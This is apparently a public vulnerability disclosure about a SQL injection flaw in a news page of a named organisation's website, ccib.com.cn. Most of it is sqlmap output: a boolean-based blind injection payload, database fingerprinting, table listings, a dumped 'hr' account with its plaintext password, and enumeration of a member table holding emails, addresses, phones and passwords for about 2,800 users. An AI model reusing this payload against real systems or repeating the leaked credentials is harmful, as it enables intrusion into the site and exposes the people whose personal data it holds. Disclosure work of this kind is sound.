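2015-12-21: Actively contacting the vendor and waiting for the vendor to claim the report; details are not public.
2016-02-01: The vendor has chosen to ignore the vulnerability; details are disclosed to the public.
Injection point: http://www.ccib.com.cn/CHN/About/newsShow.asp?news_id=428
Data: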
Place: GET
Parameter: news_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: news_id=428 AND 8592=8592
---
[13:09:56] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
[9 tables]
+------------+
| admin_user |
| area       |
| branch     |
| company    |
| exam       |
| guestbook  |
| job        |
| member     |
| news       |
+------------+
[4 columns]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| news_id   | numeric     |
| password  | numeric     |
| user_id   | numeric     |
| user_name | non-numeric |
+-----------+-------------+
Test leak: one hr account
+---------+----------+---------+-----------+
| news_id | password | user_id | user_name |
+---------+----------+---------+-----------+
| 428     | 888888   | 2       | hr        |
+---------+----------+---------+-----------+
Test leak: user email, address, password, gender, phone and so on
Table: member
[8 columns]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| address   | non-numeric |
| email     | non-numeric |
| gender    | numeric     |
| loginname | non-numeric |
| news_id   | numeric     |
| passwd    | numeric     |
| phone     | numeric     |
| question  | non-numeric |
+-----------+-------------+
Nearly 3000
[14:04:06] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[14:04:06] [INFO] retrieved: 2829
[14:04:12] [INFO] fetching number of distinct values for column 'email'
Unable to reach the vendor, or the vendor actively refused.